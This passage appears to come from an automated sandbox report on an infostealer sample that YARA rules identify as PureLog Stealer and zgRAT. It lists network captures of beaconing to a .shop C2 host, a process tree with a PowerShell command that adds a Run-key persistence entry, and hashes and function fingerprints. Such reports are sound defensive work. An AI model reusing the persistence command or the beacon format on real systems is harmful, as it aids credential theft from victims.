6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 Data Ascii: den">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></sp
2024-09-19 00:39:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49785	172.67.142.26	443	7340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:39:03 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=0fcLYSc6YsiKoAYwmJmcMFCKyHhREaq9Ck1_0rmeC58-1726706343-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: eemmbryequo.shop
2024-09-19 00:39:03 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 76 30 66 52 75 2d 2d 26 6a 3d 62 34 66 30 31 37 37 37 65 64 63 38 35 31 61 61 34 37 62 64 64 62 30 31 61 35 62 39 34 32 66 37 Data Ascii: act=recive_message&ver=4.0&lid=hv0fRu--&j=b4f01777edc851aa47bddb01a5b942f7
2024-09-19 00:39:04 UTC	800	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:39:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=34qp24g50623dup4g2f6efoh0d; expires=Sun, 12 Jan 2025 18:25:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg5J5h6rwna%2F7eMarDlmZy1YyPhsbbTZfFKMLbxELDr%2BeUI8wGpHWWm0dJCPV8cL72Z55DOiOGYNLCWc%2FbwdHudZckPUKe%2B7%2FSMk3m1u5jJvtbiCIuhtcgWtrzJXl0Mr5XIk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c5584386f5e18a1-EWR alt-svc: h3=":443"; ma=86400
2024-09-19 00:39:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-19 00:39:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	20:37:43
Start date:	18/09/2024
Path:	C:\Users\user\Desktop\57lklPjdPc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\57lklPjdPc.exe"
Imagebase:	0xdd0000
File size:	352'768 bytes
MD5 hash:	C164ED9887BD51CBA150379514DC4E81
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.50539479323.00000000043CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.50539479323.000000000458A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	20:37:45
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'
Imagebase:	0x880000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:37:45
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60a670000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:37:59
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\57lklPjdPc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
Imagebase:	0xcd0000
File size:	352'768 bytes
MD5 hash:	C164ED9887BD51CBA150379514DC4E81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 62%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:38:07
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\57lklPjdPc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
Imagebase:	0xe20000
File size:	352'768 bytes
MD5 hash:	C164ED9887BD51CBA150379514DC4E81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:38:56
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat" "
Imagebase:	0xf90000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:38:56
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60a670000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:38:56
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x560000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:38:56
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 localhost
Imagebase:	0xbd0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:39:00
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\l6E.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\l6E.exe"
Imagebase:	0x1c0000
File size:	354'168 bytes
MD5 hash:	FAC2188E4A28A0CF32BF4417D797B0F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:39:00
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60a670000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:39:01
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x90000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:39:01
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	20:39:03
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7340 -s 1692
Imagebase:	0x1d0000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 05ED8D18 Relevance: 16.5, Strings: 12, Instructions: 1496COMMON

Download Yara Rule

Strings

$mq, xrefs: 05ED9AEC
4, xrefs: 05ED9C68
$mq, xrefs: 05ED94B6
$mq, xrefs: 05ED9B9B
,qq, xrefs: 05ED9DDC
$mq, xrefs: 05ED93B1
$mq, xrefs: 05ED93C1
$mq, xrefs: 05ED9ADC
$mq, xrefs: 05ED911F
$mq, xrefs: 05ED94C6
$mq, xrefs: 05ED9B8B
$mq, xrefs: 05ED910F

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: ,qq$4$$mq$$mq$$mq$$mq$$mq$$mq$$mq$$mq$$mq$$mq
API String ID: 0-3754881703
Opcode ID: 39fc8b017fd6a4c7c713f46cbac0bc42bbb6c3b53e52e50bcd3283e8cfe43af4
Instruction ID: 3f5be2c11a6356d5ffb2615bdbcd2c882ac579d206d7d26541d42a7756a7ef36
Opcode Fuzzy Hash: 39fc8b017fd6a4c7c713f46cbac0bc42bbb6c3b53e52e50bcd3283e8cfe43af4
Instruction Fuzzy Hash: 93E23F74B00118CFDB15DF59D898AAEF7B6FB88304F1080A9E9499B395CB34AD46CF91

Function 05765530 Relevance: 9.4, Strings: 7, Instructions: 683COMMON

Download Yara Rule

Strings

pqq, xrefs: 05765B55
TJrq, xrefs: 0576587A
Temq, xrefs: 05765859
Oi8(, xrefs: 05765742
4'mq, xrefs: 05765B16
TJrq, xrefs: 057655B9
xbpq, xrefs: 05765591

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$Oi8($TJrq$TJrq$Temq$pqq$xbpq
API String ID: 0-1562455266
Opcode ID: 3d12042f7feab3b798432db2c88d23866064b2598477bb4debe6b6df0e41dff4
Instruction ID: efc2d30978fbea134e36596d69029f0bd7ef58824c07bb01cdaa31411b037ab5
Opcode Fuzzy Hash: 3d12042f7feab3b798432db2c88d23866064b2598477bb4debe6b6df0e41dff4
Instruction Fuzzy Hash: 32520575A00614DFCB15DFA8C988E69BBB2FF48314F5581A8E54A9B272CB31EC51EF40

Function 05ED9202 Relevance: 8.2, Strings: 6, Instructions: 696COMMON

Download Yara Rule

Strings

4, xrefs: 05ED9C68
,qq, xrefs: 05ED9DDC
$mq, xrefs: 05ED94B6
$mq, xrefs: 05ED93B1
$mq, xrefs: 05ED9ADC
$mq, xrefs: 05ED9B8B

Memory Dump Source

Source File: 00000000.00000002.50546900431.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ed0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: ,qq$4$$mq$$mq$$mq$$mq
API String ID: 0-234242431
Opcode ID: d4c2408a5c3d3e8732e5c80aca296891b3c2d12434ae38d9a7f4d15f304f7952
Instruction ID: 9bf82463778e93956212f9ea5945517109c5c8092491262d94049fd33084d57c
Opcode Fuzzy Hash: d4c2408a5c3d3e8732e5c80aca296891b3c2d12434ae38d9a7f4d15f304f7952
Instruction Fuzzy Hash: 79622C74B00118CFDB25DF68D898AAEF7B6FB88304F1080A9D9499B395DB34AD46CF51

Function 05FC9070 Relevance: 4.3, Strings: 3, Instructions: 569COMMON

Download Yara Rule

Strings

Hqq, xrefs: 05FC9828
Hqq, xrefs: 05FC98CD
Hqq, xrefs: 05FC986A

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: Hqq$Hqq$Hqq
API String ID: 0-3015599393
Opcode ID: 8f2c53d4194f3ac2f929596b728cab763c6125c57aa73a4b45ec8777768f9e9c
Instruction ID: 658eebf87f92fe092f3cbbf726310185f62e7c32cf720e6305e0feb656d0e9ce
Opcode Fuzzy Hash: 8f2c53d4194f3ac2f929596b728cab763c6125c57aa73a4b45ec8777768f9e9c
Instruction Fuzzy Hash: 63323074B002098FDB14DFA5D998A6EBBB2FF88300F50856DD90A97354DF78AC46CB91

Function 05761D30 Relevance: 3.3, Strings: 2, Instructions: 797COMMON

Download Yara Rule

Strings

Dtq, xrefs: 05761DCF
Temq, xrefs: 057646C7

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: Dtq$Temq
API String ID: 0-15411105
Opcode ID: feca8f08764e396d2dbe8b4b426d143b80880e208ca6707708c960cb98c90a26
Instruction ID: d7c0840259adf9d235cb6ba4f53f34d052c37692cc7c1c7da09abcebcedf9526
Opcode Fuzzy Hash: feca8f08764e396d2dbe8b4b426d143b80880e208ca6707708c960cb98c90a26
Instruction Fuzzy Hash: 6C52F676E046408FCF35CF39C495AAABBE3FB55200B55C86DCCA697712D261E902FB42

Function 057651BF Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

4'mq, xrefs: 0576529F
4'mq, xrefs: 05765274

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: fdd3988d57794b373b4b6daa27c340170ae7838a7242447f260d3cf74dc5d1c1
Instruction ID: aef37f32a9d0913bc2877df593d76e3676857e3f5caa9e0a109139c158d5c191
Opcode Fuzzy Hash: fdd3988d57794b373b4b6daa27c340170ae7838a7242447f260d3cf74dc5d1c1
Instruction Fuzzy Hash: 11511CB0B216458BD708DF6EE855A6ABFE3FFC9244F14C839D4049B268EF346846CB51

Function 057651D0 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

4'mq, xrefs: 0576529F
4'mq, xrefs: 05765274

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: a7649e965b65c25767b1767806fc74d9f4e118d57c383ed46781a02be44016c4
Instruction ID: 0e67cd277624ba01f41b9791a6c8bada2d9ad59a7ca5c60c15c20db919a16ff5
Opcode Fuzzy Hash: a7649e965b65c25767b1767806fc74d9f4e118d57c383ed46781a02be44016c4
Instruction Fuzzy Hash: D7511CB0B216458BD708DF6EE855A6ABFE3FFC9244F14C839D4049B264EF386845CB51

Function 05FC0040 Relevance: 1.9, Strings: 1, Instructions: 698COMMON

Download Yara Rule

Strings

(_mq, xrefs: 05FC0350

Memory Dump Source

Source File: 00000000.00000002.50547664195.0000000005FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fc0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: (_mq
API String ID: 0-3564332288
Opcode ID: 6272b83bfaee4fd14ef55f8b51f61bc368c65372ecf798584e6fa17ceffa0510
Instruction ID: 0a1bc14f2e3342430feed3fe986af9d130c5f90be6eaafc3e1fae46f4b84317a
Opcode Fuzzy Hash: 6272b83bfaee4fd14ef55f8b51f61bc368c65372ecf798584e6fa17ceffa0510
Instruction Fuzzy Hash: 685262B5B01109CFD714DFA8E598A6EBBB6FB88300F158569DA06DB344DF389C06CB91

Function 0576D910 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452bf9c5fb3f110f1439d846cc042902474fcfd45a035272cc9260a21843c2ee
Instruction ID: 427c9dd37709e257b9549341ccdcd1cbcf120faeb85bb866adb9fed4da05d161
Opcode Fuzzy Hash: 452bf9c5fb3f110f1439d846cc042902474fcfd45a035272cc9260a21843c2ee
Instruction Fuzzy Hash: 7DB17D70F14209DFDB20CFA9C9857AEBBF2BF88304F188129D815A7294EB749841DF81

Function 0576E1E0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a62ac45b0fee40a55a42d4cd0cbabbe5d3dc5271ab11167b287bc365992521
Instruction ID: 22dcae00b55184fe2a654729d0e68e8cb7088a7e0188471bc302e87f1fb41b6a
Opcode Fuzzy Hash: 33a62ac45b0fee40a55a42d4cd0cbabbe5d3dc5271ab11167b287bc365992521
Instruction Fuzzy Hash: 37B17074E00209DFDB10CFA9C885BAEBBF6BF48314F148529EC15E7294EB749885DB91

Function 0576D5C8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427fffa3896e26ac0affc6416ab763e25255a55ba43628250c7befa25cd4def5
Instruction ID: 6bd86d5bb4c29bbbf827171813d452332852c7b0e3620480ef7f39226eebbb7c
Opcode Fuzzy Hash: 427fffa3896e26ac0affc6416ab763e25255a55ba43628250c7befa25cd4def5
Instruction Fuzzy Hash: AF914EB0F102099FDB24CFA9C9857EDBBF2BF88354F148129D805A7294EB749885DB91

Function 016FAAB0 Relevance: 6.5, Strings: 5, Instructions: 256COMMON

Download Yara Rule

Strings

4'mq, xrefs: 016FAD81
(qq, xrefs: 016FADDE
4'mq, xrefs: 016FAC1A
pqq, xrefs: 016FAD9A
4'mq, xrefs: 016FAB34

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: (qq$4'mq$4'mq$4'mq$pqq
API String ID: 0-291296460
Opcode ID: 9a759b5baaece56531ab39786bb6a44600cb071d64e6f4ad0b2e461519ca7cd6
Instruction ID: 855d397177e4df04cb3dfde2f72277608c4b563e36c9c3719ac66ced25f1af33
Opcode Fuzzy Hash: 9a759b5baaece56531ab39786bb6a44600cb071d64e6f4ad0b2e461519ca7cd6
Instruction Fuzzy Hash: C091E370A0610A9FD748EFA8E8547BE7BB6FF89300F10812DD5099B395DB349D85CBA1

Function 016C1B18 Relevance: 6.3, Strings: 2, Instructions: 3776COMMON

Download Yara Rule

Strings

4'mq, xrefs: 016C5017
4'mq, xrefs: 016C500B

Memory Dump Source

Source File: 00000000.00000002.50530691942.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16c0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: 4c8d2901408a542856be5a2dcf28423754396c9315630330d8d5345e9a436d97
Instruction ID: b9c33509affe68f8d8a2a7aadc583910fbaa51505bb11d576cc3830c01bcff12
Opcode Fuzzy Hash: 4c8d2901408a542856be5a2dcf28423754396c9315630330d8d5345e9a436d97
Instruction Fuzzy Hash: B7537030F012259BDF759F6D9C2423EA9EAFF88A10F24845ED90AD7358DF748C418B92

Function 05978020 Relevance: 6.3, Strings: 2, Instructions: 3776COMMON

Download Yara Rule

Strings

4'mq, xrefs: 0597B513
4'mq, xrefs: 0597B51F

Memory Dump Source

Source File: 00000000.00000002.50545406263.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: bc8ab06151c8072427558731f9bfb82ab765ddbc259132f40d4033c5a3369ecb
Instruction ID: 83d0a2f3c3adcac2f9704424318cde5108086c65ff4b6ddcbc3a6e7474bc67be
Opcode Fuzzy Hash: bc8ab06151c8072427558731f9bfb82ab765ddbc259132f40d4033c5a3369ecb
Instruction Fuzzy Hash: 9553C670F201298BCB349B69846963E79FBEFC9B00F54455BE946DB344EF708C818B96

Function 05761779 Relevance: 5.2, Strings: 4, Instructions: 159COMMON

Download Yara Rule

Strings

Temq, xrefs: 05761832
Temq, xrefs: 0576186B
Temq, xrefs: 057618C0
Temq, xrefs: 057618AA

Memory Dump Source

Source File: 00000000.00000002.50544792661.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5760000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: Temq$Temq$Temq$Temq
API String ID: 0-3399637147
Opcode ID: 25c98fa8af2ba9e94c7369e10d13d60ca212877fe1b61283055b6651f87e4bbf
Instruction ID: d3dc4818f479ee92eb578e014124ea6bc62b6debbfda020db15c5944ac5c5819
Opcode Fuzzy Hash: 25c98fa8af2ba9e94c7369e10d13d60ca212877fe1b61283055b6651f87e4bbf
Instruction Fuzzy Hash: 68511A74B101048FCB58EF69D59CAAEBBF2BF88700F254469E40AEB3A5CE759C01DB50

Function 016FAAA0 Relevance: 4.0, Strings: 3, Instructions: 205COMMON

Download Yara Rule

Strings

4'mq, xrefs: 016FAC1A
pqq, xrefs: 016FAD9A
4'mq, xrefs: 016FAB34

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq$pqq
API String ID: 0-1713726553
Opcode ID: adba6e32757316ae13b720a403bf6d91937f6435a7c549404fe4c498c9be98cb
Instruction ID: b6eab4383c42862dfd968bd4897b1b5adbae120971fd3ec81a80fefb5ad98b23
Opcode Fuzzy Hash: adba6e32757316ae13b720a403bf6d91937f6435a7c549404fe4c498c9be98cb
Instruction Fuzzy Hash: 34819170A0510A9FD748EFA8DC54BBE7BB6FF89300F10812DD5099B295DB34AC85CBA1

Function 016FABD5 Relevance: 3.9, Strings: 3, Instructions: 178COMMON

Download Yara Rule

Strings

4'mq, xrefs: 016FAC1A
pqq, xrefs: 016FAD9A
4'mq, xrefs: 016FAB34

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq$pqq
API String ID: 0-1713726553
Opcode ID: 814226772be1ce609c1a032b5df28459419cdff267e2134c44fb2e0e2d2c81de
Instruction ID: 882727e579c4a4e490cb79984c4f3bba418bf0bd4289c1639b28d4c8ef55c426
Opcode Fuzzy Hash: 814226772be1ce609c1a032b5df28459419cdff267e2134c44fb2e0e2d2c81de
Instruction Fuzzy Hash: 6F615F70A0510A9FD748EFA8D8547BE7BA7FF88304F10812DD50A9B295DB34AC85CBA1

Function 016F7FF8 Relevance: 2.9, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

d, xrefs: 016F8259
(qq, xrefs: 016F800C

Memory Dump Source

Source File: 00000000.00000002.50530830268.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: (qq$d
API String ID: 0-2216008712
Opcode ID: 458e4340140b6c5819b7b2e72a9bb04ab0d549c270f27374a9432bc2bb581823
Instruction ID: 0d58f3196404ada18711275ba1d03ea483fad174d411200aa37e18701c111e83
Opcode Fuzzy Hash: 458e4340140b6c5819b7b2e72a9bb04ab0d549c270f27374a9432bc2bb581823
Instruction Fuzzy Hash: 70E17D357006068FCB15DF58C88496AB7F6FF89310B19C9ADD65A8B366DB30F842CB90

Function 0597B750 Relevance: 2.8, Strings: 2, Instructions: 255COMMON

Download Yara Rule

Strings

4'mq, xrefs: 0597BA60
4'mq, xrefs: 0597BA6C

Memory Dump Source

Source File: 00000000.00000002.50545406263.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: 4c807dc7906bc1a8e11aea878146772d8bc1bddb319488cce50f8845a6ed7eb9
Instruction ID: 2469b5c2d770feab46df3e6ce84b2998b9ceec60f1bef961e8e1071dd9e74727
Opcode Fuzzy Hash: 4c807dc7906bc1a8e11aea878146772d8bc1bddb319488cce50f8845a6ed7eb9
Instruction Fuzzy Hash: 2091B47472060A8B8B19AB25D0A45BEBAF7FFC9214B54452AE946C7344FF34DC42CB85

Function 016C7250 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

4'mq, xrefs: 016C7548
4'mq, xrefs: 016C7554

Memory Dump Source

Source File: 00000000.00000002.50530691942.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16c0000_57lklPjdPc.jbxd

Similarity

API ID:
String ID: 4'mq$4'mq
API String ID: 0-3441688425
Opcode ID: 0ac2b446d6dcb831121ba9f85477d0489dbb05d1b9625c82c928c8b066e93cf3
Instruction ID: 1f1c5eb3423ada6654f43f2ed1422786d586b6a7a36794720c10070ab66a4a1e
Opcode Fuzzy Hash: 0ac2b446d6dcb831121ba9f85477d0489dbb05d1b9625c82c928c8b066e93cf3
